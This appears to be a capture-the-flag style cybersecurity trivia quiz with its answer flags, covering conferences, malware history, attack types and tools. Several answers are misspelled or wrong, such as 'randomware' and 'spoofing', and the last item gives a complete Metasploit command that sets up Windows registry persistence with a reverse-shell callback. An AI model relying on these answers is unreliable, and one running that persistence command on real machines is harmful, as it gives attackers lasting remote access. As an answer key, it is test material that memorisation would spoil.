Business Gathering
Business Gathering
I am a huge cyber security conference that run every year in three places : San Francisco, Singapore and Lately AbuDhabi. Who am I ? No spaces in answering
- Flag: RSAConference
Hackers Gathering
I am a cyber security conference that run in August every year in Las Vegas. I am the largest gathering for Hackers in the whole world. No Credit cards, no online booking , Only Cash allowed . Who am I ?
- Flag: defcon
Founder
I have founded two of the most famous Cyber Security conferences across the globe in Las Vegas, USA. I am not The Dark Knight. I am The DarK--------?
- Flag: tangent
Back To History
Back to History: I am the First Computer Virus ever known . You will find me in your head . My name is ……..?
- Flag: brain
Contribute
I am an Organization that releases the Top 10 Vulnerabilities in Application Security . I am ……?
- Flag: OWASP
Greeks
The art of hiding messages or information inside other image / text or data
- Flag: steganography
Robot
A group or network of machines that are controlled by an attacker to do a certain task
- Flag: bot
Japanese Warrior
I am a linux distrubition with two versions one for Web Penetration Testing and the other for attacking smart grids. What is my smart grid distribution name ?
- Flag: SamuraiSTFU
Close Look
I am a linux distribution that has many tricks to do packet and traffic analysis. Who am I ?
- Flag: Packetrix
Pay Me
I will lock your machine screen or files till you pay me. Who am i ?
- Flag: randomware
TrendMicro Conference
Periodic Conference in many cities hosted by Trend Micro
- Flag: CLOUDSEC
Intercept
the attacker intercept information between receiver and sender. what is the attack name ?
- Flag: mitm
Do you trust senders
Receive malware from a known person. What is the attack type ?
- Flag: spoofing
My box
I am a professional pen tester. I do not need to know any information from the customer, I do ....box pen test
- Flag: black
Crash
enter a lot of random trash till the application crash
- Flag: fuzzing
Scan
One of the famous, free port scanner. Who am i ?
- Flag: nmap
Capture
Network analysis tool used to captured packets and present it in readable format
- Flag: wireshark
Precious Vulnerability
a security flaw that is not yet known
- Flag: zeroday
SCADA
A worm that targeted SCADA Systems
- Flag: Stuxnet
htmlentities
True or False , htmlentities ( convert special characters to its html entity ) can't be exploited to run XSS payload ?
- Flag: False
Encoding
What type of this encoded , hashed text "aGVsbG93b3JsZDEx" ?
- Flag: base64
Reward
I receive a reward or mentioned on a wall of fame when i found vulnerability . I am participating in ..... program? Format of Flag ( Do not use spaces)
- Flag: bugbounty
Hide me
I act as a middle man to forward requests from different devices to access external resources . I am a ......?
- Flag: proxy
Cash
I am a type of attacks that used to spread malware. I push data in the cache records of your DNS. I am cache ........?
- Flag: poisoning
User Name
He is a user name or account that by default has access to all commands and files on a Linux or other Unix-like operating system.
- Flag: root
Crime scene
Process of analyzing and investing computer devices, on suspecting that such devices may have been used in a cybercrime
- Flag: forensics
CVE Number
What is the CVE ID that is related to EternalBlue
Flag Format: XXX-XXXX-XXXX
- Flag: CVE-2017-0144
one click
a type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts .
- Flag: CSRF
remove
I need to remove a file called secret in my home directory. which command should i use
- Flag: rm ~/secret
Distribution
Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture
The flag without spaces
- Flag: KaliLinux
security model
is a model designed to guide policies for information security within an organization
- Flag: CIA
Persistence
You want to achieve persistence using Meterpreter’s persistence module by creating an autorun registry file and getting a shell automatically every time the user restarts the PC
Persistence options
Minutes after restarting the system: 7
Your Local port: 1337
Your local host IP: 192.168.0.177
Flag format is: xxx xxxxxxx/xxxxxxx/xxxxx/xxxxxxxx_xxxxxxxxxxx xxxxx_xxxx=xxx xxxxx=xxxx xxxxx=xxx.xxx.x.xxx
- Flag: use exploit/windows/local/registry_persistence SLEEP_TIME=420 LPORT=1337 LHOST=192.168.0.177